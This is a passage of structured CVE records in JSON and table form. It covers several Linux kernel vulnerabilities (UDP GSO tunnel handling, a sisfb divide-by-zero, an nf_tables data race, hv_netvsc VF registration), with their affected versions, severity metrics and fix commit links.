"version": "9fd1ff5d2ac7181844735806b0a703c942365291",
"versionType": "git"
},
{
"lessThan": "35fe0e0b5c00bef7dde74842a2564c43856fbce4",
"status": "affected",
"version": "9fd1ff5d2ac7181844735806b0a703c942365291",
"versionType": "git"
},
{
"lessThan": "3d010c8031e39f5fa1e8b13ada77e0321091011f",
"status": "affected",
"version": "9fd1ff5d2ac7181844735806b0a703c942365291",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/linux/udp.h",
"net/ipv4/udp.c",
"net/ipv4/udp_offload.c",
"net/ipv6/udp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nudp: do not accept non-tunnel GSO skbs landing in a tunnel\n\nWhen rx-udp-gro-forwarding is enabled UDP packets might be GROed when\nbeing forwarded. If such packets might land in a tunnel this can cause\nvarious issues and udp_gro_receive makes sure this isn\u0027t the case by\nlooking for a matching socket. This is performed in\nudp4/6_gro_lookup_skb but only in the current netns. This is an issue\nwith tunneled packets when the endpoint is in another netns. In such\ncases the packets will be GROed at the UDP level, which leads to various\nissues later on. The same thing can happen with rx-gro-list.\n\nWe saw this with geneve packets being GROed at the UDP level. In such\ncase gso_size is set; later the packet goes through the geneve rx path,\nthe geneve header is pulled, the offset are adjusted and frag_list skbs\nare not adjusted with regard to geneve. When those skbs hit\nskb_fragment, it will misbehave. Different outcomes are possible\ndepending on what the GROed skbs look like; from corrupted packets to\nkernel crashes.\n\nOne example is a BUG_ON[1] triggered in skb_segment while processing the\nfrag_list. Because gso_size is wrong (geneve header was pulled)\nskb_segment thinks there is \"geneve header size\" of data in frag_list,\nalthough it\u0027s in fact the next packet. The BUG_ON itself has nothing to\ndo with the issue. This is only one of the potential issues.\n\nLooking up for a matching socket in udp_gro_receive is fragile: the\nlookup could be extended to all netns (not speaking about performances)\nbut nothing prevents those packets from being modified in between and we\ncould still not find a matching socket. It\u0027s OK to keep the current\nlogic there as it should cover most cases but we also need to make sure\nwe handle tunnel packets being GROed too early.\n\nThis is done by extending the checks in udp_unexpected_gso: GSO packets\nlacking the SKB_GSO_UDP_TUNNEL/_CSUM bits and landing in a tunnel must\nbe segmented.\n\n[1] kernel BUG at net/core/skbuff.c:4408!\n RIP: 0010:skb_segment+0xd2a/0xf70\n __udp_gso_segment+0xaa/0x560"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:33.854Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3391b157780bbedf8ef9f202cbf10ee90bf6b0f8"
},
{
"url": "https://git.kernel.org/stable/c/d49ae15a5767d4e9ef8bbb79e42df1bfebc94670"
},
{
"url": "https://git.kernel.org/stable/c/d12245080cb259d82b34699f6cd4ec11bdb688bd"
},
{
"url": "https://git.kernel.org/stable/c/3001e7aa43d6691db2a878b0745b854bf12ddd19"
},
{
"url": "https://git.kernel.org/stable/c/35fe0e0b5c00bef7dde74842a2564c43856fbce4"
},
{
"url": "https://git.kernel.org/stable/c/3d010c8031e39f5fa1e8b13ada77e0321091011f"
}
],
"title": "udp: do not accept non-tunnel GSO skbs landing in a tunnel",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35884",
"datePublished": "2024-05-19T08:34:40.948Z",
"dateReserved": "2024-05-17T13:50:33.112Z",
"dateUpdated": "2025-05-04T09:07:33.854Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26777 (GCVE-0-2024-26777)
Vulnerability from cvelistv5
Published
2024-04-03 17:01
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fbdev: sis: Error out if pixclock equals zero
The userspace program could pass any values to the driver through
ioctl() interface. If the driver doesn't check the value of pixclock,
it may cause divide-by-zero error.
In sisfb_check_var(), var->pixclock is used as a divisor to caculate
drate before it is checked against zero. Fix this by checking it
at the beginning.
This is similar to CVE-2022-3061 in i740fb which was fixed by
commit 15cf0b8.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26777",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T18:10:58.840983Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:30.706Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.470Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84246c35ca34207114055a87552a1c4289c8fd7e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6db07619d173765bd8622d63809cbfe361f04207"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd36da760bd1f78c63c7078407baf01dd724f313"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df6e2088c6f4cad539cf67cba2d6764461e798d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f329523f6a65c3bbce913ad35473d83a319d5d99"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/99f1abc34a6dde248d2219d64aa493c76bbdd9eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d11dd3ea5d039c7da089f309f39c4cd363b924b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e421946be7d9bf545147bea8419ef8239cb7ca52"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/video/fbdev/sis/sis_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "84246c35ca34207114055a87552a1c4289c8fd7e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6db07619d173765bd8622d63809cbfe361f04207",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cd36da760bd1f78c63c7078407baf01dd724f313",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "df6e2088c6f4cad539cf67cba2d6764461e798d1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f329523f6a65c3bbce913ad35473d83a319d5d99",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "99f1abc34a6dde248d2219d64aa493c76bbdd9eb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1d11dd3ea5d039c7da089f309f39c4cd363b924b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e421946be7d9bf545147bea8419ef8239cb7ca52",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/video/fbdev/sis/sis_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: sis: Error out if pixclock equals zero\n\nThe userspace program could pass any values to the driver through\nioctl() interface. If the driver doesn\u0027t check the value of pixclock,\nit may cause divide-by-zero error.\n\nIn sisfb_check_var(), var-\u003epixclock is used as a divisor to caculate\ndrate before it is checked against zero. Fix this by checking it\nat the beginning.\n\nThis is similar to CVE-2022-3061 in i740fb which was fixed by\ncommit 15cf0b8."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:16.696Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/84246c35ca34207114055a87552a1c4289c8fd7e"
},
{
"url": "https://git.kernel.org/stable/c/6db07619d173765bd8622d63809cbfe361f04207"
},
{
"url": "https://git.kernel.org/stable/c/cd36da760bd1f78c63c7078407baf01dd724f313"
},
{
"url": "https://git.kernel.org/stable/c/df6e2088c6f4cad539cf67cba2d6764461e798d1"
},
{
"url": "https://git.kernel.org/stable/c/f329523f6a65c3bbce913ad35473d83a319d5d99"
},
{
"url": "https://git.kernel.org/stable/c/99f1abc34a6dde248d2219d64aa493c76bbdd9eb"
},
{
"url": "https://git.kernel.org/stable/c/1d11dd3ea5d039c7da089f309f39c4cd363b924b"
},
{
"url": "https://git.kernel.org/stable/c/e421946be7d9bf545147bea8419ef8239cb7ca52"
}
],
"title": "fbdev: sis: Error out if pixclock equals zero",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26777",
"datePublished": "2024-04-03T17:01:02.935Z",
"dateReserved": "2024-02-19T14:20:24.177Z",
"dateUpdated": "2025-05-04T08:56:16.696Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35898 (GCVE-0-2024-35898)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: Fix potential data-race in __nft_flowtable_type_get()
nft_unregister_flowtable_type() within nf_flow_inet_module_exit() can
concurrent with __nft_flowtable_type_get() within nf_tables_newflowtable().
And thhere is not any protection when iterate over nf_tables_flowtables
list in __nft_flowtable_type_get(). Therefore, there is pertential
data-race of nf_tables_flowtables list entry.
Use list_for_each_entry_rcu() to iterate over nf_tables_flowtables list
in __nft_flowtable_type_get(), and use rcu_read_lock() in the caller
nft_flowtable_type_get() to protect the entire type query process.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 Version: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 Version: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 Version: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 Version: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 Version: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 Version: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 Version: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35898",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-29T18:29:13.616197Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-29T19:40:06.574Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.658Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69d1fe14a680042ec913f22196b58e2c8ff1b007"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a347bc8e6251eaee4b619da28020641eb5b0dd77"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/940d41caa71f0d3a52df2fde5fada524a993e331"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2485bcfe05ee3cf9ca8923a94fa2e456924c79c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9b5b7708ec2be21dd7ef8ca0e3abe4ae9f3b083b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b891153b2e4dc0ca9d9dab8f619d49c740813df"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e684b1674fd1ca4361812a491242ae871d6b2859"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/24225011d81b471acc0e1e315b7d9905459a6304"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "69d1fe14a680042ec913f22196b58e2c8ff1b007",
"status": "affected",
"version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
"versionType": "git"
},
{
"lessThan": "a347bc8e6251eaee4b619da28020641eb5b0dd77",
"status": "affected",
"version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
"versionType": "git"
},
{
"lessThan": "940d41caa71f0d3a52df2fde5fada524a993e331",
"status": "affected",
"version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
"versionType": "git"
},
{
"lessThan": "2485bcfe05ee3cf9ca8923a94fa2e456924c79c8",
"status": "affected",
"version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
"versionType": "git"
},
{
"lessThan": "9b5b7708ec2be21dd7ef8ca0e3abe4ae9f3b083b",
"status": "affected",
"version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
"versionType": "git"
},
{
"lessThan": "8b891153b2e4dc0ca9d9dab8f619d49c740813df",
"status": "affected",
"version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
"versionType": "git"
},
{
"lessThan": "e684b1674fd1ca4361812a491242ae871d6b2859",
"status": "affected",
"version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
"versionType": "git"
},
{
"lessThan": "24225011d81b471acc0e1e315b7d9905459a6304",
"status": "affected",
"version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: Fix potential data-race in __nft_flowtable_type_get()\n\nnft_unregister_flowtable_type() within nf_flow_inet_module_exit() can\nconcurrent with __nft_flowtable_type_get() within nf_tables_newflowtable().\nAnd thhere is not any protection when iterate over nf_tables_flowtables\nlist in __nft_flowtable_type_get(). Therefore, there is pertential\ndata-race of nf_tables_flowtables list entry.\n\nUse list_for_each_entry_rcu() to iterate over nf_tables_flowtables list\nin __nft_flowtable_type_get(), and use rcu_read_lock() in the caller\nnft_flowtable_type_get() to protect the entire type query process."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:54.817Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/69d1fe14a680042ec913f22196b58e2c8ff1b007"
},
{
"url": "https://git.kernel.org/stable/c/a347bc8e6251eaee4b619da28020641eb5b0dd77"
},
{
"url": "https://git.kernel.org/stable/c/940d41caa71f0d3a52df2fde5fada524a993e331"
},
{
"url": "https://git.kernel.org/stable/c/2485bcfe05ee3cf9ca8923a94fa2e456924c79c8"
},
{
"url": "https://git.kernel.org/stable/c/9b5b7708ec2be21dd7ef8ca0e3abe4ae9f3b083b"
},
{
"url": "https://git.kernel.org/stable/c/8b891153b2e4dc0ca9d9dab8f619d49c740813df"
},
{
"url": "https://git.kernel.org/stable/c/e684b1674fd1ca4361812a491242ae871d6b2859"
},
{
"url": "https://git.kernel.org/stable/c/24225011d81b471acc0e1e315b7d9905459a6304"
}
],
"title": "netfilter: nf_tables: Fix potential data-race in __nft_flowtable_type_get()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35898",
"datePublished": "2024-05-19T08:34:52.519Z",
"dateReserved": "2024-05-17T13:50:33.114Z",
"dateUpdated": "2025-05-04T09:07:54.817Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26820 (GCVE-0-2024-26820)
Vulnerability from cvelistv5
Published
2024-04-17 09:43
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
hv_netvsc: Register VF in netvsc_probe if NET_DEVICE_REGISTER missed
If hv_netvsc driver is unloaded and reloaded, the NET_DEVICE_REGISTER
handler cannot perform VF register successfully as the register call
is received before netvsc_probe is finished. This is because we
register register_netdevice_notifier() very early( even before
vmbus_driver_register()).
To fix this, we try to register each such matching VF( if it is visible
as a netdevice) at the end of netvsc_probe.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 028aa21f9e92536038cabb834c15d08f5c894382 Version: 997d895fa495fb3421983923219bba93f1a793ee Version: ff6c130e48a79c826cbc2427bd8b34a7592460cc Version: 97683466e24c801ee4e865ce90ac7e355db2da59 Version: 5dd83db613be8e5c5d30efed7f42780e9eb18380 Version: 7350c460f7f48a8653a15c5c90fc9070aaa29535 Version: 85520856466ed6bc3b1ccb013cddac70ceb437db Version: 85520856466ed6bc3b1ccb013cddac70ceb437db |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26820",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T19:59:53.031569Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:04.707Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.523Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcb7164258d0a9a8aa2e73ddccc2d78f67d2519d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7441c77c91e47f653104be8353b44a3366a5366"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5b10a88f64c0315cfdef45de0aaaa4eef57de0b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6d46f306b3964d05055ddaa96b58cd8bd3a472c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/309ef7de5d840e17607e7d65cbf297c0564433ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a71302c8638939c45e4ba5a99ea438185fd3f418"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4d29a58d96a78728cb01ee29ed70dc4bd642f135"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9cae43da9867412f8bd09aee5c8a8dc5e8dc3dc2"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/hyperv/netvsc_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
